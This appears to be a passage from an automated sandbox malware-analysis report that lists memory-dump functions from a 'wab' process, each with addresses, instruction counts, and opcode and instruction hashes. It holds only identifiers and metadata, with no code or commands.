                                                                                    • Instruction ID: e330824a9d2fdd0603303f00ea675b983490abb841207d3a4ba3f7a07637c21d
                                                                                    • Opcode Fuzzy Hash: 8f737f0f00a62ca7feb269012a5df5687131c87f6536780a005b969ec9db5a45
                                                                                    • Instruction Fuzzy Hash: 4831497550D3C49FCB13DB24D994711BF71AF47214F2985DBD8888F2A3C27A984ACB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0279D044 Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3593420237.000000000279D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0279D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_279d000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0a9d4f092440d7d506fab258ea254346a48f950e9000b36aa300b2da62678e0f
                                                                                    • Instruction ID: 839c582f3aabd0e6b21aceeae031cbc886fb6541976da1e03074c80211d9885d
                                                                                    • Opcode Fuzzy Hash: 0a9d4f092440d7d506fab258ea254346a48f950e9000b36aa300b2da62678e0f
                                                                                    • Instruction Fuzzy Hash: BD2107B5504304EFDF24EF28E9C0B26BB61FB88314F20C56DD9494B251C776D446CA61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAAF70 Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d08ed0619a0ce1edd4fd28ada6f44daeec896596545f411a4662c4e9d8a68ffd
                                                                                    • Instruction ID: 9d66a17e8339ed1d428015ee9cb187ed5e6f20195bdabe5f4ea886c29d7f0b5e
                                                                                    • Opcode Fuzzy Hash: d08ed0619a0ce1edd4fd28ada6f44daeec896596545f411a4662c4e9d8a68ffd
                                                                                    • Instruction Fuzzy Hash: E9216271D0076A8BDB25CFA9C84069EBBB6FF85314F10852AE905FB344EB759945CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA6D60 Relevance: .1, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fd9b99dd76fbf4587c9c821896b7127a7798f9107cf75010c6c6816ab75d4cdb
                                                                                    • Instruction ID: 4ea226ca64b4b77b22a6ff9a9142ab258015f1698493ac1796e2c0af36870ad1
                                                                                    • Opcode Fuzzy Hash: fd9b99dd76fbf4587c9c821896b7127a7798f9107cf75010c6c6816ab75d4cdb
                                                                                    • Instruction Fuzzy Hash: 3A217230B0112A9BDB05EFADE55069EB7B7EF84750F248829E405EB385DA75ED418B80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA3BF8 Relevance: .1, Instructions: 59COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7ece6b3468624d655e33454961fbb4437433a51c64ebcd8745680974aa2fbeed
                                                                                    • Instruction ID: cfe3e13d0e594e87a5ab764065049db82d1e2efd439171121a16dfd53924ce13
                                                                                    • Opcode Fuzzy Hash: 7ece6b3468624d655e33454961fbb4437433a51c64ebcd8745680974aa2fbeed
                                                                                    • Instruction Fuzzy Hash: 8511A131B1012A4BCB449A7DCC24AAEB3EBEBC8610F04453AD80AE7394EE74DC019BD0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA38B0 Relevance: .1, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 36cdbcdbd174ec8023f9ddf3261afb40e4e53c7662ed89589b27720a2fcf0350
                                                                                    • Instruction ID: 0a1851eed261872177f02b140426869d4e3ac82e8f9815c01563987d649f7c6b
                                                                                    • Opcode Fuzzy Hash: 36cdbcdbd174ec8023f9ddf3261afb40e4e53c7662ed89589b27720a2fcf0350
                                                                                    • Instruction Fuzzy Hash: 3421E3B1D01659AFCB00CF9AD981BCEFBB4FF48720F10812AE518A7600D3B4A954CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA423A Relevance: .1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ca97690a4143fe8f6bf59a0bf902730237ba3ee57a3c766c2cd7596b660f52d4
                                                                                    • Instruction ID: 26de1fa88ef0d52ab5a1440afd064af8573bc6f80362ba16c99459574556f14d
                                                                                    • Opcode Fuzzy Hash: ca97690a4143fe8f6bf59a0bf902730237ba3ee57a3c766c2cd7596b660f52d4
                                                                                    • Instruction Fuzzy Hash: 7601D431B041614FE712D6BC841076EABD7EBC9714F14893EE84ED7386D979DD028395
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAEDE1 Relevance: .1, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c3efa45a4f7c969517f0946ab4344ae4e0cd206fa52286991a04dfdff0747311
                                                                                    • Instruction ID: 8f06fc2e1c89c860e9569ac059d910474570af49f7907abf4bc3bab17ec0e3b1
                                                                                    • Opcode Fuzzy Hash: c3efa45a4f7c969517f0946ab4344ae4e0cd206fa52286991a04dfdff0747311
                                                                                    • Instruction Fuzzy Hash: 7701DF71B405610BDB169A3C8890B5A77D7EBC9B20F148839E58AC7382E929DD024381
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA38B8 Relevance: .1, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a6ff5fe466b8d6890508304637284e3795b17f5f777502f2f837643219f5341f
                                                                                    • Instruction ID: a49d9ac4fcf1f1f919e6800252d9312eaed56fd869600612df32d0a230b3fb05
                                                                                    • Opcode Fuzzy Hash: a6ff5fe466b8d6890508304637284e3795b17f5f777502f2f837643219f5341f
                                                                                    • Instruction Fuzzy Hash: 7611D3B1D012599FCB00CF9AD985BDEFBB4FF48720F10812AE518A7300D3B4A950CBA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA3BE7 Relevance: .1, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7501b26ad297941f3e255351702c93feebbd144c1bdb09c174be941e3504a8d8
                                                                                    • Instruction ID: 562c06e8553466ba00aa3edce9ca2ecb9f8746f439c5afb3266dd777969c3781
                                                                                    • Opcode Fuzzy Hash: 7501b26ad297941f3e255351702c93feebbd144c1bdb09c174be941e3504a8d8
                                                                                    • Instruction Fuzzy Hash: A3012B32B101254BDB449A7DDC206EF77EBEFC9610F04053AD50AD7385EEA48C0247D1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA4248 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dea7b7df943b607fee383b9c53655d952f5b7de4cd9027f5cfce2f89810acfce
                                                                                    • Instruction ID: 6e8db8321fb41eec4f6b8596a5d6e9af07fa8531eb0360f244ae4bb29e7e9e6b
                                                                                    • Opcode Fuzzy Hash: dea7b7df943b607fee383b9c53655d952f5b7de4cd9027f5cfce2f89810acfce
                                                                                    • Instruction Fuzzy Hash: 3D01D130B000214BEB2699AC8410B2BB7DBEBC9B14F208939E90EC7386DD79DC024785
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAEDF0 Relevance: .0, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 684626147f164fb4a6a2a423e3d37644f8b5f67a99600342dc40e26c741c6e27
                                                                                    • Instruction ID: 9bd5d55878f6d3c1724e772653341932e23ff2de843023e13a10ab3cd6118f9a
                                                                                    • Opcode Fuzzy Hash: 684626147f164fb4a6a2a423e3d37644f8b5f67a99600342dc40e26c741c6e27
                                                                                    • Instruction Fuzzy Hash: 8001AF71B404224BDB169A2CC490B6FB3D7EBC9B20F148839E58EC7341EE29DD0243C1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAA368 Relevance: .0, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d408ce23d79a8ba9cfbff407aebfef8c0216d9a2007db83abcf2129a6eec5515
                                                                                    • Instruction ID: cbdd65019eb80d4fd3e1e37cb8166d50f5e5e7c76fb8c93eddbc4ad93d4ec864
                                                                                    • Opcode Fuzzy Hash: d408ce23d79a8ba9cfbff407aebfef8c0216d9a2007db83abcf2129a6eec5515
                                                                                    • Instruction Fuzzy Hash: F3013C30B011254BD716DA6CC894B5EB3EBEB89B14F108C29E90ADB345EE6ADD428784
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAC830 Relevance: .0, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9ed737d6474248b1b0e67163e74a5759010e3ffd7c1d776b9837d57fc556d487
                                                                                    • Instruction ID: a469a55cba26c755feaf12b2db6eb32bcdd0247de518f99b4e5ec8a0a93713b7
                                                                                    • Opcode Fuzzy Hash: 9ed737d6474248b1b0e67163e74a5759010e3ffd7c1d776b9837d57fc556d487
                                                                                    • Instruction Fuzzy Hash: 8301FF31F102289BCB099A6DE840A9EB777FB84710F00493DE905EB385DA36AD018B80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA64C0 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 105533289c672c70b77a2127566478a11c6e4a8ee0802eacdb3449de9dbea2de
                                                                                    • Instruction ID: 749c3d092a2403663e649b49135f630832718a0580677afb7af95309f15e5dd8
                                                                                    • Opcode Fuzzy Hash: 105533289c672c70b77a2127566478a11c6e4a8ee0802eacdb3449de9dbea2de
                                                                                    • Instruction Fuzzy Hash: FAE01271B0412EABDB10DEB9C94574E77AED705618F2088A5D44DD7302E677DB028750
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%